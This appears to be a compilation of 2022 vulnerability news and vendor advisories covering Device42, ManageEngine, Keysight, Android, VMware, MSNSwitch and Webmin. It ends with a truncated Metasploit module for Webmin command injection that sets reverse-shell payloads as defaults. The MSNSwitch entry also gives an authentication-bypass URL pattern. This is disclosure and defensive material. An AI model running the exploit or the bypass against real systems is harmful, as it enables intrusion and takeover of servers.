Cybersecurity researchers have disclosed multiple severe security vulnerabilities asset management platform Device42 that, if successfully exploited, could enable a malicious actor to seize control of affected systems.
"By exploiting these issues, an attacker could impersonate other users, obtain admin-level access in the application (by leaking session with an LFI) or obtain full access to the

Cybersecurity researchers have disclosed multiple severe security vulnerabilities asset management platform Device42 that, if successfully exploited, could enable a malicious actor to seize control of affected systems.

"By exploiting these issues, an attacker could impersonate other users, obtain admin-level access in the application (by leaking session with an LFI) or obtain full access to the appliance files and database (through remote code execution)," Bitdefender said in a Wednesday report.

Even more concerningly, an adversary with any level of access within the host network could daisy-chain three of the flaws to bypass authentication protections and achieve remote code execution with the highest privileges.

The issues in question are listed below -

*   **CVE-2022-1399** - Remote Code Execution in scheduled tasks component
*   **CVE-2022-1400** - Hard-coded encryption key IV in Exago WebReportsApi.dll
*   **CVE 2022-1401** - Insufficient validation of provided paths in Exago
*   **CVE-2022-1410** - Remote Code Execution in ApplianceManager console

The most critical of the weaknesses is CVE-2022-1399, which makes it possible to execute bash instructions through command injection and with root permissions, granting the attacker full control over the underlying appliance.

Although remote code execution cannot be achieved by itself, it can be stringed together with CVE 2022-1401 and CVE-2022-1400 to extract valid session identifiers of already authenticated users by taking advantage of a local file inclusion vulnerability discovered in the Exago reporting component.

Following responsible disclosure by the Romanian cybersecurity firm on February 18, the flaws were addressed by Device42 in version 18.01.00 released on July 7, 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Critical Flaws Disclosed in Device42 IT Asset Management Software

The new open source tools are designed to help defense, identity and access management, and security operations center teams discover vulnerable network shares.

Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools PowerHuntShares and PowerHunt help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs \[access control lists\]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and perform initial analysis. 

Network shares configured with excessive permissions can be exploited in several ways. For example, ransomware can use excessive read permissions on shares to access sensitive data. Since passwords are commonly stored in cleartext, excessive read permissions can lead to remote attacks against databases and other servers if these passwords are uncovered. Excessive write access allows attackers to add, remove, modify, and encrypt files, such as writing a web shell or tampering with executable files to include a persistent backdoor.   

"We can leverage Active Directory to help create an inventory of systems and shares," Sutherland wrote. "Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways, remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done)."

New Open Source Tools Launched for Adversary Simulation

Four serious security issues on the popular appliance could be exploited by hackers with any level of access within the host network, Bitdefender researchers say.

A series of vulnerabilities on the popular asset management platform Device42 could be exploited to give attackers full root access to the system, according to Bitdefender.

By exploiting a remote code execution (RCE) vulnerability in the staging instance of the platform, attackers could successfully obtain full root access and gain complete control of the assets housed inside, Bitdefender researchers wrote in the report. The RCE vulnerability (CVE-2022-1399) has a base score of 9.1 out of 10 and is rated "critical," explains Bogdan Botezatu, director of threat research and reporting at Bitdefender.

"By exploiting these issues, an attacker could impersonate other users, obtain admin level access in the application (by leaking session with a LFI) or obtain full access to the appliance files and database (through remote code execution)," the report noted.

RCE vulnerabilities allow attackers to manipulate the platform to execute unauthorized code as root — the most powerful level of access on a device. Such code can compromise the application as well as the virtual environment the app is running on.

To get to the remote code execution vulnerability, an attacker that has no permissions on the platform (such as a regular employee outside of the IT and service desk teams) needs to first bypass authentication and gain access to the platform.

**Chaining Flaws in Attacks**

This can be made possible through another vulnerability described in the paper, CVE-2022-1401, that lets anyone on the network read the contents of several sensitive files in the Device42 appliance.

The file holding session keys are encrypted, but another vulnerability present in the appliance (CVE-2022-1400) helps an attacker retrieve the decryption key that is hardcoded in the app.

"The daisy-chain process would look like this: an unprivileged, unauthenticated attacker on the network would first use CVE-2022-1401 to fetch the encrypted session of an already authenticated user," Botezatu says.

This encrypted session will be decrypted with the key hardcoded in the appliance, thanks to CVE-2022-1400. At this point, the attacker becomes an authenticated user.

"Once logged in, they can use CVE-2022-1399 to fully compromise the machine and gain complete control of the files and database contents, execute malware and so on," Botezatu says. "This is how, by daisy-chaining the described vulnerabilities, a regular employee can take full control of the appliance and the secrets stored inside it."

He adds these vulnerabilities can be discovered by running a thorough security audit for applications that are about to be deployed across an organization.

"Unfortunately, this requires require significant talent and expertise to be available in house or on contract," he says. "Part of our mission to keep customers safe is to identify vulnerabilities in applications and IoT devices, and then to responsible disclose our findings to the affected vendors so they can work on fixes."

These vulnerabilities have been addressed. Bitdefender received version 18.01.00 ahead of public release and was able to validate that the four reported vulnerabilities — CVE-2022-1399, CVE-2022-1400, CVE 2022-1401, and CVE-2022-1410 — are no longer present. Organizations should immediately deploy the fixes, he says.

Earlier this month, a critical RCE bug was discovered in DrayTek routers, which exposed SMBs to zero-click attacks — if exploited, it could give hackers complete control of the device, along with access to the broader network.

Multiple Vulnerabilities Discovered in Device42 Asset Management Appliance

Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, and OpUtils before 2022-07-29 through 2022-07-30 ( 125658, 126003, 126105, and 126120) allow authenticated users to make database changes that lead to remote code execution.

**Remote Code Execution - CVE-2022-37024**

**Severity:** High

**CVE ID:** CVE-2022-37024

**Product name**

**Affected Version(s)**

**Fixed Version(s)**

**Fixed On**

OpManager  
OpManager Plus  
OpManager MSP  
Network Configuration Manager  
NetFlow Analyzer  
OpUtils

Customers with builds between 126113 and 126119

126120

29-07-2022

Customers with builds between 126100 and 126104

126105

30-07-2022

Customers with builds 126000 and 126002

Customers with build 125664

126003

Customers with builds between 125450 and 125657

125658

**Details:**

There was an Remote Code Execution (RCE) vulnerability reported by Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative. This has been fixed now.

**Impact:**

Any authenticated user can carry out changes to the database and perform RCE using it.

**Steps to upgrade:**

1.  Kindly download the latest upgrade pack from the following links for the respective products:
    *   OpManager: https://www.manageengine.com/network-monitoring/service-packs.html
    *   OpManager Plus: https://www.manageengine.com/it-operations-management/service-packs.html
    *   OpManager MSP: https://www.manageengine.com/network-monitoring-msp/service-packs.html
    *   Network Configuration Manager: https://www.manageengine.com/network-configuration-manager/upgradepack.html
    *   NetFlow Analyzer: https://www.manageengine.com/products/netflow/service-packs.html
2.  Apply the latest build to your existing product installation as per the upgrade pack instructions provided in the above links.

**Source and Acknowledgements**

This vulnerability was reported by (Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative). Find out more about CVE-2022-37024 from the CVE dictionary.

Kindly contact the respective product support teams for further details at the below mentioned email addresses:

*   OpManager: opmanager-support@manageengine.com
*   OpManager Plus: opmanagerplus-support@manageengine.com
*   OpManager MSP: msp-opmanager-support@manageengine.com
*   Network Configuration Manager: ncm-support@manageengine.com
*   NetFlow Analyzer: netflowanalyzer-support@manageengine.com
*   OpUtils oputils-support@manageengine.com

CVE-2022-37024: Security Updates - CVE-2022-37024 | ManageEngine OpManager

A path traversal vulnerability exists in the com.keysight.tentacle.licensing.LicenseManager.addLicenseFile() method in the Keysight Sensor Management Server (SMS). This allows an unauthenticated remote attacker to upload arbitrary files to the SMS host.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2022-28

CVSSv3 Base / Temporal Score

CVSSv3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Products

Keysight Technologies Sensor Management Server v2.4.0

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Thank You**

Thank you for your interest in Tenable.ot. A representative will be in touch soon.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See Tenable.ep In Action**

Know the exposure of every asset on any platform.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

CVE-2022-38129: Keysight Technologies Sensor Management Server Multiple RCE Vulnerabilities

In Task.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-185810717

_Published August 1, 2022 | Updated August 3, 2022_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2022-08-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution over Bluetooth with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2022-08-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2022-08-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2021-39696

A-185810717

EoP

High

10, 11, 12

CVE-2022-20344

A-232541124

EoP

High

10, 11, 12, 12L

CVE-2022-20348

A-228315529

EoP

High

10, 11, 12, 12L

CVE-2022-20349

A-228315522

EoP

High

10, 11, 12, 12L

CVE-2022-20356

A-215003903

EoP

High

11, 12, 12L

CVE-2022-20350

A-228178437 \[2\]

ID

High

10, 11, 12, 12L

CVE-2022-20352

A-222473855

ID

High

12, 12L

CVE-2022-20357

A-214999987

ID

High

12, 12L

CVE-2022-20358

A-203229608

ID

High

10, 11, 12, 12L

**Media Framework**

The most severe vulnerability in this section could lead to remote information disclosure with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-20346

A-230493653

ID

High

10, 11, 12, 12L

CVE-2022-20353

A-221041256 \[2\] \[3\]

ID

High

10, 11, 12, 12L

**System**

The most severe vulnerability in this section could lead to remote code execution over Bluetooth with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-20345

A-230494481

RCE

Critical

12, 12L

CVE-2022-20347

A-228450811

EoP

High

10, 11, 12, 12L

CVE-2022-20354

A-219546241

EoP

High

11, 12, 12L

CVE-2022-20360

A-228314987

EoP

High

10, 11, 12, 12L

CVE-2022-20361

A-231161832

EoP

High

10, 11, 12, 12L

CVE-2022-20355

A-219498290 \[2\]

DoS

High

10, 11, 12, 12L

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Component

CVE

Media Framework components

CVE-2022-20346

**2022-08-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2022-08-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel components**

The vulnerability in this section could lead to local escalation of privileges with User execution privileges needed.

    

CVE

References

Type

Severity

Component

CVE-2022-1786

A-233078742  
Upstream kernel

EoP

High

Filesystem (fs)

**Imagination Technologies**

These vulnerabilities affect Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of these issues is provided directly by Imagination Technologies.

   

CVE

References

Severity

Component

CVE-2021-0698  

A-236848165\*

High

PowerVR-GPU

CVE-2021-0887  

A-236848817\*

High

PowerVR-GPU

CVE-2021-0891

A-236849490\*

High

PowerVR-GPU

CVE-2021-0946  

A-236846966\*

High

PowerVR-GPU

CVE-2021-0947  

A-236838960\*

High

PowerVR-GPU

CVE-2021-39815

A-232440670\*

High

PowerVR-GPU

CVE-2022-20122

A-232441339\*

High

PowerVR-GPU

**MediaTek components**

This vulnerability affects MediaTek components and further details are available directly from MediaTek. The severity assessment of this issue is provided directly by MediaTek.

   

CVE

References

Severity

Component

CVE-2022-20082

A-231271467  
M-ALPS07044730\*

High

GPU

**Unisoc components**

This vulnerability affects Unisoc components and further details are available directly from Unisoc. The severity assessment of this issue is provided directly by Unisoc.

   

CVE

References

Severity

Component

CVE-2022-20239

A-233972091  
U-1883877\*

High

VSP

**Qualcomm components**

This vulnerability affects Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of this issue is provided directly by Qualcomm.

   

CVE

References

Severity

Component

CVE-2022-22080  

A-231156274  
QC-CR#2898981

High

Audio

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Component

CVE-2021-30259

A-187074564\*

High

Closed-source component

CVE-2022-22059

A-231156126\*

High

Closed-source component

CVE-2022-22061

A-218338332\*

High

Closed-source component

CVE-2022-22062  

A-218338070\*

High

Closed-source component

CVE-2022-22067

A-218338889\*

High

Closed-source component

CVE-2022-22069

A-218339148\*

High

Closed-source component

CVE-2022-22070

A-218338870\*

High

Closed-source component

CVE-2022-25668

A-231156523\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2022-08-01 or later address all issues associated with the 2022-08-01 security patch level.
*   Security patch levels of 2022-08-05 or later address all issues associated with the 2022-08-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2022-08-01\]
*   \[ro.build.version.security\_patch\]:\[2022-08-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2022-08-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2022-08-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2022-08-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference mvalue belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

August 1, 2022

Bulletin Published

1.1

August 3, 2022

Bulletin revised to include AOSP links

CVE-2021-39696: Android Security Bulletin—August 2022  |  Android Open Source Project

VMware vRealize Operations contains a privilege escalation vulnerability. A malicious actor with administrative network access can escalate privileges to root.

Advisory ID: VMSA-2022-0022

CVSSv3 Range: 5.6-7.2

Issue Date: 2022-08-09

Updated On: 2022-08-09 (Initial Advisory)

CVE(s): CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, CVE-2022-31675

Synopsis: VMware vRealize Operations contains multiple vulnerabilities

Share this page on social media

Sign up for Security Advisories

****1\. Impacted Products****

*   VMware vRealize Operations

****2\. Introduction****

Multiple vulnerabilities in vRealize Operations were privately reported to VMware. Patches are available to remediate this vulnerability in affected VMware products. 

****3a. Privilege Escalation Vulnerability (CVE-2022-31672)****

VMware vRealize Operations contains a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.2.

A malicious actor with administrative network access can escalate privileges to root.

To remediate CVE-2022-31672, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

****3b. Information Disclosure Vulnerability (CVE-2022-31673)****

VMware vRealize Operations contains an information disclosure vulnerability.  VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5.

A low-privileged malicious actor with network access can create and leak hex dumps, leading to information disclosure. Successful exploitation can lead to a remote code execution.

To remediate CVE-2022-31673, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

****3c. Information Disclosure Vulnerability (CVE-2022-31674)****

VMware vRealize Operations contains an information disclosure vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5.

A low-privileged malicious actor with network access can access log files that lead to information disclosure.

To remediate CVE-2022-31674, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

****3d. Authentication Bypass Vulnerability (CVE-2022-31675)****

VMware vRealize Operations contains an authentication bypass vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.6.

An unauthenticated malicious actor with network access may be able to create a user with administrative privileges. 

To remediate CVE-2022-31675, apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' found below.

VMware would like to thank Steven Seeley (mr\_me) of Qihoo 360 Vulnerability Research Institute for reporting this issue to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

VMware vRealize Operations

8.x

Any

CVE-2022-31672, CVE-2022-31673, CVE-2022-31674, CVE-2022-31675

7.2, 6.5, 5.6

important

8.6.4

None

None

****4\. References****

****5\. Change Log****

**2022-08-09: VMSA-2022-0022  
**Initial security advisory.

****6\. Contact****

CVE-2022-31672: VMSA-2022-0022

An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.

**CVE-2022-32429****Authentication Bypass and Remote Code Execution on MSNSwitch firmware MNT.2408****Affected Product:**

The affected product is the MSNSwitch Internet-enabled power strip running firmware version MNT.2408. It is unknown if any previous versions are affected.

**Vulnerability Type:**

Authentication Bypass, Command Execution

**Root Cause:**

The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.

The authentication bypass is caused by a routing misconfiguration in the embedded "goahead" web browser. A trailing forward slash is omitted when the route for the cgi-bin directory is defined. This forward slash is present when the path is defined for authentication purposes. This misconfiguration causes URLs of the form http://{TARGET}:{PORT}/cgi-binANYSTRINGHERE to access the /cgi-bin/ directory without requiring authentication.

For instance, the device settings can be accessed at the URL: http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh

With credentials in hand, it is then possible to exploit a command injection flaw in the /cgi-bin/upgrade.cgi script to execute arbitrary commands on the device. This flaw is caused by insufficient sanitization of a user specified field.

**Impact:**

An attacker can remotely obtain the access credentials for the device itself as well as for other services that the device may be connected to. If configured, this can include Google accounts, accounts for various dynamic DNS providers, other email accounts and Skype/SMS account information. In addition, the attacker will have control over the device itself, including the ability to power cycle connected devices.

The command execution vulnerability is less significant, as it requires the attacker to be on the same subnet as the device. However, if an attacker is in that position, they can obtain full root shell access.

**POC Code:**CVE-2022-32429-POC.py

CVE-2022-32429

This Metasploit module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Webmin Package Updates RCE',        'Description' => %q{          This module exploits an arbitrary command injection in Webmin          versions prior to 1.997.          Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform          package updates and installation. Due to a lack of input          sanitization, it is possibe to inject arbitrary command that will be          concatenated to the package manager call.          This exploit requires authentication and the account must have access          to the Software Package Updates module.        },        'License' => MSF_LICENSE,        'Author' => [          'Christophe De La Fuente', # MSF module          'Emir Polat' # Discovery and PoC        ],        'References' => [          [ 'EDB', '50998' ],          [ 'URL', 'https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165'],          [ 'CVE', '2022-36446']        ],        'DisclosureDate' => '2022-07-26',        'Platform' => ['unix', 'linux'],        'Privileged' => true,        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],        'Payload' => { 'BadChars' => '/' },        'DefaultOptions' => {          'RPORT' => 10000,          'SSL' => true        },        'Targets' => [          [            'Unix In-Memory',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }            }          ],          [            'Linux Dropper (x86 & x64)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }            }          ],          [            'Linux Dropper (ARM64)',            {              'Platform' => 'linux',              'Arch' => ARCH_AARCH64,              'Type' => :linux_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'Base path to Webmin', '/']),        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ false, 'Password to login with', '123456'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") unless res    if res.body.include?('This web server is running in SSL mode.')      return CheckCode::Unknown("#{peer} - Please enable the SSL option to proceed")    end    version = res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first    return CheckCode::Unknown("#{peer} - Webmin version not detected") unless version    version = Rex::Version.new(version)    vprint_status("Webmin #{version} detected")    unless version < Rex::Version.new('1.997')      return CheckCode::Safe("#{peer} - Webmin #{version} is not a supported target")    end    vprint_good("Webmin #{version} is a supported target")    CheckCode::Appears  rescue ::Rex::ConnectionError    return CheckCode::Unknown("#{peer} - Could not connect to web service")  end  def do_login    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/session_login.cgi'),      'headers' => { 'Referer' => full_uri },      'cookie' => 'testing=1',      'keep_cookies' => true,      'vars_post' => {        'user' => datastore['USERNAME'],        'pass' => datastore['PASSWORD']      }    })    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") unless res    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") unless res.code == 302    print_good('Logged in!')  end  def execute_command(cmd, _opts = {})    cmd = cmd.gsub('/', '${SEP}').gsub('\'', '"')    cmd = "#{rand_text_alphanumeric(4)};SEP=$(perl -MMIME::Base64 -e \"print decode_base64('Lw==')\")&&#{cmd}"    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/package-updates/update.cgi'),      'headers' => { 'Referer' => full_uri },      'vars_post' => {        'mode' => 'new',        'search' => rand_text(10),        'redir' => '',        'redirdesc' => '',        'u' => cmd,        'confirm' => 'Install Now'      }    })  end  def exploit    print_status('Attempting login')    do_login    print_status('Sending payload')    case target['Type']    when :unix_memory      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  rescue 